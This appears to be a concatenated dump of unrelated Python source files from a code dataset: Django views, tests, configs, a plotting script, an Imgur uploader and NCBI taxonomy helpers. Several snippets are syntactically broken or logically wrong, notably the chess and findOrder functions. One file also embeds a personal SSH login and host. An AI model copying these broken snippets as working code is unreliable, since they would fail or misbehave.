kwargs.update({'profesor': pp,
'user': self.request.user,
'colegio': self.request.session.get('colegio__pk', None)})
return kwargs
def get_success_url(self):
return reverse(
'carga-horaria:profesor',
kwargs={
'pk': self.object.profesor.pk,
}
)
class AsignacionNoAulaDeleteView(LoginRequiredMixin, DeleteView):
model = AsignacionNoAula
template_name = 'carga_horaria/periodo/eliminar_periodo.html'
def get(self, request, *args, **kwargs):
return self.post(request, *args, **kwargs)
def get_success_url(self):
return reverse(
'carga-horaria:profesor',
kwargs={
'pk': self.object.profesor.pk,
}
)
@login_required
def asignar_asistente(request, pk, tipo):
pp = get_object_or_404(Asistente, pk=pk)
tipo_display = dict(AsignacionAsistente.TIPO_CHOICES)[int(tipo)]
if request.method == 'POST':
form = AsignacionAsistenteForm(request.POST, asistente=pp, user=request.user, colegio=request.session.get('colegio__pk', None), periodo=request.session.get('periodo', 2020))
if form.is_valid():
asignacion = form.save(commit=False)
asignacion.asistente = pp
asignacion.tipo = tipo
# if asignacion.horas == 0:
# asignacion.horas = pp.horas_no_lectivas_disponibles
asignacion.save()
return redirect('carga-horaria:asistente', pp.pk)
else:
form = AsignacionAsistenteForm(user=request.user, colegio=request.session.get('colegio__pk', None))
return render(request, 'carga_horaria/asignar_asistente.html', {'asistente': pp,
'form': form})
class AsignacionAsistenteDeleteView(LoginRequiredMixin, DeleteView):
model = AsignacionAsistente
template_name = 'carga_horaria/periodo/eliminar_periodo.html'
def get(self, request, *args, **kwargs):
return self.post(request, *args, **kwargs)
def get_success_url(self):
return reverse(
'carga-horaria:asistente',
kwargs={
'pk': self.object.asistente.pk,
}
)
@login_required
def profesores_info(request):
output = io.BytesIO()
# Create a workbook and add a worksheet.
workbook = xlsxwriter.Workbook(output)
worksheet = workbook.add_worksheet('Profesores')
# Some data we want to write to the worksheet.
qs = get_for_user(request, Profesor.objects.all(), 'colegio__pk', request.user)
# Start from the first cell. Rows and columns are zero indexed.
row = 0
col = 0
# Iterate over the data and write it out row by row.
worksheet.write(0, 0, 'RUT')
worksheet.write(0, 1, 'Nombre Docente')
worksheet.write(0, 2, 'Dirección Docente')
worksheet.write(0, 3, 'Comuna')
worksheet.write(0, 4, 'Nacionalidad')
worksheet.write(0, 5, 'Teléfono')
worksheet.write(0, 6, 'Email personal')
worksheet.write(0, 7, 'Email institucional')
worksheet.write(0, 8, 'Estado civil')
worksheet.write(0, 9, 'Discapacidad')
worksheet.write(0, 10, 'Recibe pensión')
worksheet.write(0, 11, 'Adventista')
worksheet.write(0, 12, 'Fecha de Nacimiento')
worksheet.write(0, 13, 'Tipo de Contrato')
worksheet.write(0, 14, 'Cargo')
worksheet.write(0, 15, 'Fecha de Inicio Contrato')
worksheet.write(0, 16, 'Horas Contrato Propuestas')
worksheet.write(0, 17, 'Horas SBVG')
worksheet.write(0, 18, 'Horas SEP')
worksheet.write(0, 19, 'Horas PIE')
worksheet.write(0, 20, 'Horas Indefinidas Actual')
worksheet.write(0, 21, 'Horas Plazo Fijo Actual')
worksheet.write(0, 22, 'Horas Jornada Semanal')
worksheet.write(0, 23, 'Asignaciones Aula Plan')
worksheet.write(0, 24, 'Horas Aula PIE')
worksheet.write(0, 25, 'Horas Aula SEP')
worksheet.write(0, 26, 'Horas Aula Sostenedor')
worksheet.write(0, 27, 'Horas disponibles')
worksheet.write(0, 28, 'Asignación No Lectiva')
worksheet.write(0, 29, 'Horas no lectivas disponibles')
worksheet.write(0, 30, 'Asignación No Aula Normal')
worksheet.write(0, 31, 'Asignación No Aula PIE')
worksheet.write(0, 32, 'Asignación No Aula SEP')
worksheet.write(0, 33, 'Especialidad')
worksheet.write(0, 34, 'Profesor Jefe')
worksheet.write(0, 35, 'Fundación que lo contrata')
worksheet.write(0, 36, 'Colegio')
row = 1
for pp in qs:
worksheet.write(row, 0, pp.rut)
worksheet.write(row, 1, pp.nombre)
worksheet.write(row, 2, pp.direccion)
worksheet.write(row, 3, pp.persona.comuna)
worksheet.write(row, 4, pp.persona.nacionalidad)
worksheet.write(row, 5, pp.persona.telefono)
worksheet.write(row, 6, pp.persona.email_personal)
worksheet.write(row, 7, pp.persona.email_institucional)
worksheet.write(row, 8, pp.persona.get_estado_civil_display())
worksheet.write(row, 9, 'Sí' if pp.persona.discapacidad else 'No')
worksheet.write(row, 10, 'Sí' if pp.persona.recibe_pension else 'No')
worksheet.write(row, 11, 'Sí' if pp.persona.adventista else 'No')
worksheet.write(row, 12, pp.persona.fecha_nacimiento)
worksheet.write(row, 13, pp.get_tipo_display())
worksheet.write(row, 14, pp.get_cargo_display())
worksheet.write(row, 15, pp.fecha_inicio)
worksheet.write(row, 16, pp.horas_semanales_total)
worksheet.write(row, 17, pp.horas_sbvg_total)
worksheet.write(row, 18, pp.total_sep)
worksheet.write(row, 19, pp.total_pie)
worksheet.write(row, 20, pp.horas_indefinidas)
worksheet.write(row, 21, pp.horas_plazo_fijo)
worksheet.write(row, 22, pp.horas_semanales)
worksheet.write(row, 23, pp.horas_asignadas_plan)
worksheet.write(row, 24, pp.horas_asignadas_pie)
worksheet.write(row, 25, pp.horas_asignadas_sep)
worksheet.write(row, 26, pp.horas_asignadas_sostenedor)
worksheet.write(row, 27, pp.horas_disponibles)
worksheet.write(row, 28, pp.horas_no_lectivas_asignadas_anexo)
worksheet.write(row, 29, pp.horas_no_lectivas_disponibles)
worksheet.write(row, 30, pp.horas_no_aula_asignadas_ordinaria)
worksheet.write(row, 31, pp.horas_no_aula_asignadas_pie)
worksheet.write(row, 32, pp.horas_no_aula_asignadas_sep)
worksheet.write(row, 33, str(pp.especialidad))
worksheet.write(row, 34, pp.jefatura if pp.es_profesor_jefe else 'No')
worksheet.write(row, 35, str(pp.fundacion))
worksheet.write(row, 36, str(pp.colegio))
row += 1
workbook.close()
output.seek(0)
# Set up the Http response.
filename = 'profesores-info.xlsx'
response = HttpResponse(
output,
content_type='application/vnd.openxmlformats-officedocument.spreadsheetml.sheet'
)
response['Content-Disposition'] = 'attachment; filename=%s' % filename
return response
@login_required
def asistentes_info(request):
output = io.BytesIO()
# Create a workbook and add a worksheet.
workbook = xlsxwriter.Workbook(output)
worksheet = workbook.add_worksheet('Asistentes')
# Some data we want to write to the worksheet.
qs = get_for_user(request, Asistente.objects.all(), 'colegio__pk', request.user)
# Start from the first cell. Rows and columns are zero indexed.
row = 0
col = 0
# Iterate over the data and write it out row by row.
worksheet.write(0, 0, 'RUT')
worksheet.write(0, 1, 'Nombre Asistente')
worksheet.write(0, 2, 'Fecha de Nacimiento')
worksheet.write(0, 3, 'Nacionalidad')
worksheet.write(0, 4, 'Dirección')
worksheet.write(0, 5, 'Comuna')
worksheet.write(0, 6, 'Teléfono')
worksheet.write(0, 7, 'Email personal')
worksheet.write(0, 8, 'Email institucional')
worksheet.write(0, 9, 'Estado civil')
worksheet.write(0, 10, 'Adventista')
worksheet.write(0, 11, 'Discapacidad')
worksheet.write(0, 12, 'Recibe pensión')
worksheet.write(0, 13, 'Fecha de Inicio Contrato')
worksheet.write(0, 14, 'Horas Contrato')
worksheet.write(0, 15, 'Función')
worksheet.write(0, 16, 'SEP')
worksheet.write(0, 17, 'PIE')
worksheet.write(0, 18, 'Sostenedor')
worksheet.write(0, 19, 'Fundación que lo contrata')
worksheet.write(0, 20, 'Colegio')
row = 1
for pp in qs:
worksheet.write(row, 0, pp.rut)
worksheet.write(row, 1, pp.nombre)
worksheet.write(row, 2, pp.persona.fecha_nacimiento)
worksheet.write(row, 3, pp.persona.nacionalidad)
worksheet.write(row, 4, pp.persona.direccion)
worksheet.write(row, 5, pp.persona.comuna)
worksheet.write(row, 6, pp.persona.telefono)
worksheet.write(row, 7, pp.persona.email_personal)
worksheet.write(row, 8, pp.persona.email_institucional)
worksheet.write(row, 9, pp.persona.get_estado_civil_display())
worksheet.write(row, 10, 'Sí' if pp.persona.adventista else 'No')
worksheet.write(row, 11, 'Sí' if pp.persona.discapacidad else 'No')
worksheet.write(row, 12, 'Sí' if pp.persona.recibe_pension else 'No')
worksheet.write(row, 13, pp.fecha_inicio)
worksheet.write(row, 14, pp.horas)
worksheet.write(row, 15, pp.funcion)
worksheet.write(row, 16, pp.horas_sep)
worksheet.write(row, 17, pp.horas_pie)
worksheet.write(row, 18, pp.horas_sostenedor)
worksheet.write(row, 19, str(pp.fundacion))
worksheet.write(row, 20, str(pp.colegio))
row += 1
workbook.close()
output.seek(0)
# Set up the Http response.
filename = 'asistentes-info.xlsx'
response = HttpResponse(
output,
content_type='application/vnd.openxmlformats-officedocument.spreadsheetml.sheet'
)
response['Content-Disposition'] = 'attachment; filename=%s' % filename
return response
|
4,844 | c9279434736d4e94564170fe98163ad3be9470b1 | """ Tests for challenge116 """
import pytest
from robber import expect
from pemjh.challenge116 import main
@pytest.mark.parametrize('input, expected',
[
pytest.param(5, 12, marks=pytest.mark.example),
pytest.param(50, 20492570929,
marks=pytest.mark.regression)
])
def test_challenge116(input, expected):
""" Regression testing challenge116 """
expect(main(input)).to.eq(expected)
|
4,845 | 2fb299f5454c251dc1c77c2597ee23bf414c716e | learningRateBase = 0.001
learningRateDecreaseStep = 80
epochNum = 100
generateNum = 3
batchSize = 16
trainPoems = "./data/poems.txt"
checkpointsPath = "./model/" |
4,846 | 8c51b2c06f971c92e30d6b2d668fdd2fd75142d2 | class Reader:
@staticmethod
def read_file(file_path):
return '' |
4,847 | 4a913cfdbddb2f6b5098395814f5fc1203192b9a |
def f(p_arg, *s_args, **kw_args):
return (s_args[0] + kw_args['py'])+p_arg
r = f(3, 2, py = 1) ## value r => 6
|
4,848 | 75b13f4985fcf26fb9f7fb040554b52b13c1806d | def findOrder(numCourses,prerequisites):
d={}
for i in prerequisites:
if i[0] not in d:
d[i[0]]=[i[1]]
if i[1] not in d:
d[i[1]]=[]
else:
d[i[0]].append(i[1])
res=[]
while d:
for i in range(numCourses):
if d[i] == []:
res.append(d[i])
tmp=d[i]
del d[i]
for j in d:
if tmp in d[j]:
del d[j][tmp]
print res
p = [[1,0],[2,0],[3,1],[3,2]]
n = 4
findOrder(n, p)
|
4,849 | aa00e4569aeae58e3f0ea1a8326e35c0776f7727 | """Defines all Rady URL."""
from django.conf.urls import url, include
from django.contrib import admin
apiv1_urls = [
url(r"^users/", include("user.urls")),
url(r"^meetings/", include("meeting.urls")),
url(r"^docs/", include("rest_framework_docs.urls")),
url(r"^auth/", include("auth.urls")),
url(r"^fcm/devices/", include("device.urls")),
url(r"^statistics/", include("stats.urls")),
url(r"^admin/", include("admin.urls")),
]
urlpatterns = [
url(r"^api/v1/", include(apiv1_urls)),
url(r"^admin/", admin.site.urls),
]
|
4,850 | be566041402dc1705aa9d644edc44de8792fbb3c | from extras.plugins import PluginTemplateExtension
from .models import BGPSession
from .tables import BGPSessionTable
class DeviceBGPSession(PluginTemplateExtension):
model = 'dcim.device'
def left_page(self):
if self.context['config'].get('device_ext_page') == 'left':
return self.x_page()
return ''
def right_page(self):
if self.context['config'].get('device_ext_page') == 'right':
return self.x_page()
return ''
def full_width_page(self):
if self.context['config'].get('device_ext_page') == 'full_width':
return self.x_page()
return ''
def x_page(self):
obj = self.context['object']
sess = BGPSession.objects.filter(device=obj)
sess_table = BGPSessionTable(sess)
return self.render(
'netbox_bgp/device_extend.html',
extra_context={
'related_session_table': sess_table
}
)
template_extensions = [DeviceBGPSession]
|
4,851 | 7d0d1a53a249167edade24a4e9305c95288a8574 | def chess():
row = 0
line = 0
chess1 = []
chess2 = []
for line in range(3):
x1 = (0,line)
chess1.append(x1)
for line in range(3):
x2 = (1,line)
chess2.append(x2)
print(chess1)
print(chess2)
for x in range(len(chess1))
if chess2[x][1] != chess1[]
chess()
|
4,852 | 2e448176a755828e5c7c90e4224102a285098460 | from django.conf import settings
from django.db import migrations, models
import django_otp.plugins.otp_totp.models
class Migration(migrations.Migration):
dependencies = [
migrations.swappable_dependency(settings.AUTH_USER_MODEL),
]
operations = [
migrations.CreateModel(
name='TOTPDevice',
fields=[
('id', models.AutoField(verbose_name='ID', serialize=False, auto_created=True, primary_key=True)),
('name', models.CharField(help_text='The human-readable name of this device.', max_length=64)),
('confirmed', models.BooleanField(default=True, help_text='Is this device ready for use?')),
('key', models.CharField(default=django_otp.plugins.otp_totp.models.default_key, help_text='A hex-encoded secret key of up to 40 bytes.', max_length=80, validators=[django_otp.plugins.otp_totp.models.key_validator])),
('step', models.PositiveSmallIntegerField(default=30, help_text='The time step in seconds.')),
('t0', models.BigIntegerField(default=0, help_text='The Unix time at which to begin counting steps.')),
('digits', models.PositiveSmallIntegerField(default=6, help_text='The number of digits to expect in a token.', choices=[(6, 6), (8, 8)])),
('tolerance', models.PositiveSmallIntegerField(default=1, help_text='The number of time steps in the past or future to allow.')),
('drift', models.SmallIntegerField(default=0, help_text='The number of time steps the prover is known to deviate from our clock.')),
('last_t', models.BigIntegerField(default=-1, help_text='The t value of the latest verified token. The next token must be at a higher time step.')),
('user', models.ForeignKey(help_text='The user that this device belongs to.', to=settings.AUTH_USER_MODEL, on_delete=models.CASCADE)),
],
options={
'abstract': False,
'verbose_name': 'TOTP device',
},
bases=(models.Model,),
),
]
|
4,853 | 09a468e11651eb60e0805c151bda270e0ebecca9 | #!/usr/bin/env python
'''
fix a time and then draw the instant geopotential (contour) from
/gws/nopw/j04/ncas_generic/users/renql/ERA5_subdaily/ERA5_NH_z_1989.nc,
spatial filtered relative vorticity (shaded) from
~/ERA5-1HR-lev/ERA5_VOR850_1hr_1995_DET/ERA5_VOR850_1hr_1995_DET_T63filt.nc
and identified feature points from
~/ERA5-1HR-lev/ERA5_VOR850_1hr_1995_DET/fft_trs_pos
Loop through the height (850, 500, 250)
20211116
'''
import sys
import subprocess
import xarray as xr
import numpy as np
import pandas as pd
from datetime import datetime
import gc #garbage collector
import matplotlib
import matplotlib.pyplot as plt
from matplotlib import colors
import cartopy.crs as ccrs
import cartopy.feature as cfeat
from cartopy.mpl.ticker import LongitudeFormatter, LatitudeFormatter
import cmaps
from PIL import Image, ImageDraw, ImageSequence
def calc_frames(new_time):
old_time = datetime(new_time.year-1, 11, 30, 23)
days = (new_time - old_time).days
sec = (new_time - old_time).seconds
hours = days * 24 + sec/3600
return int(hours)
def read_point_fixtime(filname,fixtime,flonl,flonr,flats,flatn):
ff = open(filname,"r")
line1 = ff.readline()
line2 = ff.readline()
line3 = ff.readline()
line4 = ff.readline()
plat = []
plon = []
line = ff.readline()
while line:
if line.strip().split(" ")[0] == "TRACK_ID":
num = int(ff.readline().strip().split(" ")[-1])
for nl in range(0,num,1):
data = list(map(float,ff.readline().strip().split(" ")))
if str(int(data[0])) == fixtime and \
data[1]<=flonr and data[1] >= flonl and data[2]<=flatn and data[2]>=flats :
plat.append(data[2])
plon.append(data[1])
line = ff.readline()
ff.close()
print("%s total feature point in %s : %d"%(filname,fixtime,len(plat)))
return plat, plon
lonl=0 #0 #
lonr=150#360#
lats=15 #0 #
latn=70 #90 #
lat_sp = 20
lon_sp = 30
nrow = 3
ncol = 1
bmlo = 0.1
title_font=18
label_font=14
dtime = pd.date_range(start='1995-01-01 00',periods=60, freq='6H',closed=None)
#dtime = pd.date_range(start='1995-01-01 00',end='1995-01-15 00', freq='6H',closed=None)
create_gif = True #False#
nfilt="T63"
lev = [850,500,250]
cnlvl =[[-8 ,1 ]]
cnlvl2 = [30,50,100]
varname = 'z'
path = '/home/users/qd201969/ERA5-1HR-lev/'
datapath = "/gws/nopw/j04/ncas_generic/users/renql/"#t/ERA5_NH_t_1989.nc
figdir = "/home/users/qd201969/uor_track/fig/"
f = xr.open_dataset("%sERA5_subdaily/%s/ERA5_NH_%s_%d.nc"%(datapath,varname,varname,dtime[0].year))
lat = f['latitude'].data
lon = f['longitude'].data
ilon = lon[(lon>=lonl) & (lon<=lonr)]
ilat = lat[(lat>=lats) & (lat<=latn)]
ds = xr.open_dataset("/home/users/qd201969/gtopo30_0.9x1.25.nc")
phis = ds['PHIS'].sel(lon=ilon,lat=ilat,method="nearest").load()
phis = phis/9.8 # transfer from m2/s2 to m
del ds
gc.collect()
nl = 0
fcolors = cmaps.BlueDarkRed18
cnlevels = np.arange(cnlvl[nl][0], cnlvl[nl][0]+cnlvl[nl][1]*(fcolors.N-1), cnlvl[nl][1])
norm = colors.BoundaryNorm(boundaries=cnlevels, ncolors=fcolors.N,extend='both')
params = {'legend.fontsize': label_font,
'axes.labelsize': label_font,
'axes.titlesize':label_font,
'xtick.labelsize':label_font,
'ytick.labelsize':label_font}
plt.rcParams.update(params)
for nt in range(len(dtime)):
fig = plt.figure(figsize=(12,12),dpi=100)
ax = fig.subplots(nrow,ncol, subplot_kw=dict(projection=ccrs.PlateCarree())) #sharex=True, sharey=True
for nl in range(len(lev)):
var = f[varname].sel(time=dtime[nt],level=lev[nl],longitude=ilon,latitude=ilat)
var.data = var.data/9.8
path2 = "%sERA5_VOR%d_1hr_%d_DET/"%(path,lev[nl],dtime[nt].year)
plat, plon = read_point_fixtime(path2+"fft_trs_pos",dtime[nt].strftime('%Y%m%d%H'),lonl,lonr,lats,latn)
fvor = xr.open_dataset("%sERA5_VOR%d_1hr_%d_DET_%sfilt.nc"%(path2,lev[nl],dtime[nt].year,nfilt))
var1 = fvor['var'].sel(time=calc_frames(dtime[nt]),level = 1,lon=ilon,lat=ilat,method="nearest").load()
#fvor = xr.open_dataset("%sERA5_VOR_1h_dec_jan/ERA5_VOR%d_1hr_dec-jan%d_DET.nc"%(datapath,lev[nl],dtime[nt].year))
#var1 = fvor['var138'].sel(time=dtime[nt],lev=float(lev[nl]*100),lat=ilat,lon=ilon,method="nearest").load()
var1.values = var1.values*1e5
axe = ax[nl]
axe.add_feature(cfeat.COASTLINE.with_scale('110m'),edgecolor='black', linewidth=0.8, zorder=1)
axe.set_title("%s %dhPa (%d)"%(dtime[nt].strftime('%Y-%m-%d-%H:00'), lev[nl], len(plat)),fontsize=title_font)
shad = axe.contourf(ilon, ilat, var1, cnlevels,
transform=ccrs.PlateCarree(),cmap=fcolors,extend='both',norm=norm)
cont = axe.contour(ilon, ilat, var, np.arange(1000,15000,cnlvl2[nl]),
transform=ccrs.PlateCarree(), colors='gray', linewidths=1.5)
#pint = axe.plot(plon,plat,color='darkviolet', marker='o', markersize=12, transform=ccrs.PlateCarree())
pint = axe.scatter(plon,plat,10.0**2,color='k', marker='o', transform=ccrs.PlateCarree())
topo = axe.contour(ilon, ilat, phis, [1500,3000],
transform=ccrs.PlateCarree(),colors='black',linewidths=1.2)
axe.set_yticks(np.arange(lats,latn,lat_sp), crs=ccrs.PlateCarree())
axe.yaxis.set_major_formatter(LatitudeFormatter(degree_symbol=''))
axe.set_xticks(np.arange(lonl,lonr,lon_sp), crs=ccrs.PlateCarree())
axe.xaxis.set_major_formatter(LongitudeFormatter(degree_symbol=''))
position = fig.add_axes([0.85, bmlo+0.1, 0.015, 0.7]) #left, bottom, width, height
cb = plt.colorbar(shad, cax=position ,orientation='vertical')#, shrink=.9)
cb.set_label(label='T5~63 Relative Vort (1e5)', size=label_font) #, weight='bold'
plt.tight_layout(rect=(0,bmlo,1,1))
plt.savefig(figdir+"filt_vor_%s.png"%(dtime[nt].strftime('%Y%m%d%H')), bbox_inches='tight',pad_inches=0.01)
if create_gif == True:
figname = figdir+"filt_vor_*.png"
fn_stream = subprocess.check_output("ls "+figname, shell=True).decode('utf-8')
fn_list = fn_stream.split()
print(fn_list[0])
print('filenumber : '+str(len(fn_list)))
gif_name = figname.rsplit("_",1)[0]+".gif"
frames = []
for itm in fn_list:
frame = Image.open(itm)
frames.append(frame)
frames[0].save(gif_name, save_all=True, append_images=frames[1:],\
duration = 1000, loop=0, disposal=1)
subprocess.run('rm -f %s'%(figname),shell=True)
|
4,854 | 9109e649a90730df022df898a7760140275ad724 | # -*- coding:utf-8 -*-
#实现同义词词林的规格化
with open('C:\\Users\\lenovo\\Desktop\\哈工大社会计算与信息检索研究中心同义词词林扩展版.txt') as f:
with open('convert.txt','a') as w:
for line in f:
data = line[8:-1].split()
for item in data:
tmp = data.copy()
tmp.remove(item)
tmp.insert(0,item)
w.writelines('\t'.join(tmp)+'\n') |
4,855 | 05edbf3662936465eee8eee0824d1a0cca0df0e5 | # -*- coding: utf-8 -*-
# !/usr/bin/env python3
import pathlib
from PIL import Image
if __name__ == '__main__':
img_path = (pathlib.Path('..') / 'images' / 'tiger.jpg').resolve()
# image load
with Image.open(str(img_path)) as img:
# image info
print('IMAGE: {}'.format(str(img_path)))
print('Image is in {} format'.format(img.format))
print('Image size: width {} pixels, height {} pixels'.format(img.size[0], img.size[1]))
print('Image color bands: {}'.format(img.mode))
# image display
img.show()
|
4,856 | dd23cd068eea570fc187dad2d49b30376fbd4854 | from django.urls import path
from django.conf.urls import include, url
from . import views
from django.conf.urls.static import static
from django.contrib.staticfiles.urls import staticfiles_urlpatterns
appname = 'home'
urlpatterns = [
path('', views.home, name='home'),
]
urlpatterns += staticfiles_urlpatterns() |
4,857 | d414e4497bae23e4273526c0bbdecd23ed665cac | # Copyright 2018 The Cornac Authors. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# ============================================================================
# Copyright 2022 Huawei Technologies Co., Ltd
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
"""
Module containing functions for negative item sampling.
"""
import numpy as np
def sample_items(num_items, shape, random_state=None):
"""
Randomly sample a number of items.
Parameters
----------
num_items: int
Total number of items from which we should sample:
the maximum value of a sampled item id will be smaller
than this.
shape: int or tuple of ints
Shape of the sampled array.
random_state: np.random.RandomState instance, optional
Random state to use for sampling.
Returns
-------
items: np.array of shape [shape]
Sampled item ids.
"""
if random_state is None:
random_state = np.random.RandomState()
items = random_state.randint(0, num_items, shape, dtype=np.int64)
return items
|
4,858 | 750565af03d945fbdc32e26347b28977b203e9dc | # Give a string that represents a polynomial (Ex: "3x ^ 3 + 5x ^ 2 - 2x - 5") and
# a number (whole or float). Evaluate the polynomial for the given value.
#Horner method
def horner( poly, x):
result = poly[0]
for i in range(1 , len(poly)):
result = result*x + poly[i]
return result
# Let us evaluate value of
# 3x3 + 5x2 - 2x - 5 for x = 3
poly = [3 , 5 , -2 , -5 ]
x = 3
print("Value of polynomial is " , horner(poly, x)) |
4,859 | 705755340eef72470fc982ebd0004456469d23e4 | #!/usr/bin/env python
from postimg import postimg
import argparse
import pyperclip
import json
def main(args):
if not args.quiet:
print("Uploading.....")
resp = postimg.Imgur(args.img_path).upload()
if not resp['success']:
if not args.quiet:
print(json.dumps(resp, sort_keys=True, indent=4, separators=(',', ': ')))
print("Unable to upload !!!")
return None
link = resp['data']['link']
if args.github:
link = ''%link
elif args.reddit:
link = '[Reddit](%s)'%link
elif args.html:
link = '<img src="%s" alt="snap">'%link
pyperclip.copy(link)
print(link)
if __name__ == '__main__':
parser = argparse.ArgumentParser(description='Post/upload image on imgur.com', epilog='link will automatically copied to clipboard')
parser.add_argument('img_path', type=str, help='image path of file')
parser.add_argument('--github', action='store_true', help='Github markdown code of imgur url')
parser.add_argument('--html', action='store_true', help='html <img> code of imgur url')
parser.add_argument('--reddit', action='store_true', help='reddit markdown code of imgur url')
parser.add_argument('-q','--quiet', action='store_true', help='print only img url without verbose output')
args = parser.parse_args()
try:
main(args)
except KeyboardInterrupt:
print("Error: Interrupted by user!!")
|
4,860 | 5c1324207e24f2d723be33175101102bd97fe7a2 | # #!/usr/bin/python
# last edit abigailc@Actaeon on jan 27 2017
#pulling the taxonomy functions out of makespeciestree because I need to make them faster...
#insects is running for literally >20 hours.
names_file = "/Users/abigailc/Documents/Taxonomy_Stuff/taxdump/names.dmp"
nodes_file = "/Users/abigailc/Documents/Taxonomy_Stuff/taxdump/nodes.dmp"
######### PERSONAL_SETTINGS #########
ssh_inst = "ssh -l abigailc -i ~/.ssh/id_rsa eofe4.mit.edu"
clus_head = "abigailc@eofe4.mit.edu:/home/abigailc/"
Path_Blast = "/Users/abigailc/blast/"
import os
import re
import time
import sys
#from oxy_mods.Classes_DTL_Detector import Fasta
#BASIC OPERATIONS
def Str_To_Taxid(string, names_file):
#init done
#turns a string to its taxon id NCBI
#this is easier than expected. just open names.dmp and find the first hit. format:
found = False
#print("strtotaxid")
#print(string+" str to taxid")
string = string.replace("_", " ")
#print(string)
with open (names_file) as names:
for line in names:
if "\t"+string+"\t" in line:
#print("got:"+line)
taxid_int = re.sub ("(\d*)(\t\|\t)("+string+")(\t)(.*)", "\\1", line)
found = True
break
if found is False:
print("Error finding string: "+string+" in file: "+names_file)
taxid_int = "NA"
return taxid_int
def Taxid_To_Children(taxid, nodes_file):
#goes one level deeper. finds all taxids that list the given taxid as "parent", returns as a list
childlist = []
child_rank_list = []
with open (nodes_file) as nodes:
for line in nodes:
if "\t"+taxid+"\t" in line:
#print("gotcha")
#print(line)
#the thing matches, do the re.sub.
#includes the tab bc otherwise taxid 12 would match 12, 123, 12345355, etc
baby_taxid_rank = re.sub("(\d*)(\t\|\t)("+taxid+")(\t\|\t)([a-z]*)(.*)", "\\1~\\5", line)
if "\t" in baby_taxid_rank:
#this happens if the re.sub does not occur - eg if \ttaxid\t occured somewhere in the line other than where it should've.
pass
else:
baby_taxid, baby_rank = baby_taxid_rank.split("~")
#add to list of bbys
baby_taxid = baby_taxid.strip()
baby_rank = baby_rank.strip()
childlist.append(baby_taxid)
child_rank_list.append((baby_taxid, baby_rank))
return child_rank_list
def Get_Taxid_Rank(taxid, nodes_file):
taxid = taxid.strip()
ranklist = []
len_tax = len(taxid)
len_tax_t = len_tax+1
#given taxid = 100, len_tax = 3, len_tax_t = 5
with open (nodes_file) as nodes:
for line in nodes:
#print(line[:len_tax_t])
#print(taxid+"\t")
if line[:len_tax_t] == taxid+"\t":
#the thing matches, do the re.sub.
#includes the tab bc otherwise taxid 12 would match 12, 123, 12345355, etc
apparent_rank = re.sub("("+taxid+")(\t\|\t)(\d*)(\t\|\t)([a-z]*)(.*)", "\\5", line)
apparent_rank = apparent_rank.strip()
if "\t" in apparent_rank:
pass
else:
return apparent_rank
return "NA"
#returns the rank (eg, "order" of a taxid")
def One_Rank_Lower(rank):
print("looking one level lower than"+rank)
if rank == "species":
print("is species!")
return "NA"
ordered_str = "superkingdom kingdom phylum class order family genus species"
ordered_list = ordered_str.split()
if rank in ordered_list:
pass
elif rank == "NA":
return "NA"
else:
print(rank+" is weird")
return "NA"
current = ordered_list.index(rank)
lowindex = current + 1
one_lower = ordered_list[lowindex]
return one_lower
#given phylum, returns class. given class, return order. etc.
# rank = "class"
# string = "cyanobacteria"
# taxid = "12345"
def Return_Parent(taxid, nodes_file):
#eg for a given rank taxid, find it's up-one-level (not rank) taxid, and return it.
len_tax = len(taxid.strip())
len_tax_t = len_tax+1
#given taxid = 100, len_tax = 3, len_tax_t = 5
#print("searching for one level above taxid:"+str(taxid))
#print("tiud: "+taxid)
with open (nodes_file) as nodes:
for line in nodes:
#print(taxid.strip()+"\t")
#print(line[:len_tax_t])
if line[:len_tax_t] == taxid.strip()+"\t":
# print("got: "+line)
#the thing matches, do the re.sub.
#includes the tab bc otherwise taxid 12 would match 12, 123, 12345355, etc
parent_taxid = re.sub("("+taxid.strip()+")(\t\|\t)(\d*)(\t\|\t)([a-z]*)(.*)", "\\3", line)
#print(parent_taxid)
if "\t" in parent_taxid:
pass
else:
return parent_taxid
print("error finding parent taxa")
return("NA")
#COMPLEX OPERATIONS
def Ret_A_Valid_Species_Below_LESS_EFFICIENTLY(taxid, nodes_file, names_file, acc_list):
children = []
list_ch_remove = []
child_list_a = []
#this is a list of children : [ [child_taxid, child_rank], [child2_taxid, child2_rank] ]
child_list_atup = Taxid_To_Children(taxid, nodes_file)
#this is a list of children TAXIDS ONLY
#print("initial pass")
#print(child_list_atup)
#print(child_list_a)
done = False
saved_top_level = []
#we're going to do one at a time, so save all, and load them one-by-one.
for itema in child_list_atup:
saved_top_level.append(itema)
maxi = len(saved_top_level)
# print("maxi: "+str(maxi))
atup = saved_top_level[0]
saved_top_level.remove(atup)
child_list_atup = [atup]
for item in child_list_atup:
child_list_a.append(item[0])
i = 1
#also lets implement a saved second level... for further spe.
while done is False:
for item in child_list_atup:
if item[1] == "species":
#add the taxid to the list of species_level_children
children.append(item[0])
sis_spec_name = Taxid_To_Name(item[0], names_file)
if sis_spec_name[0].islower() is False:
in_blast = Check_Spec_Name_Acceptable_List(sis_spec_name, acc_list)
if in_blast is True:
return sis_spec_name
list_ch_remove.append(item)
#remove taxids that were saved at the species level
#print(list_ch_remove)
for rem in list_ch_remove:
child_list_atup.remove(rem)
child_list_a.remove(rem[0])
#if all tips have terminated at the species level: you are done.
if child_list_a == []:
if i == maxi:
#print("found none")
return "NA"
done = True
else:
i += 1
#print(i)
list_ch_remove = []
atup = saved_top_level[0]
#print(atup)
saved_top_level.remove(atup)
child_list_atup = [atup]
#print(child_list_atup)
for item in child_list_atup:
child_list_a.append(item[0])
continue
list_ch_remove = []
child_list_b = []
child_list_c = []
for parent in child_list_a:
child_list_btup = Taxid_To_Children(parent, nodes_file)
for item in child_list_btup:
child_list_b.append(item[0])
if child_list_btup == []:
pass
else:
for bitem in child_list_btup:
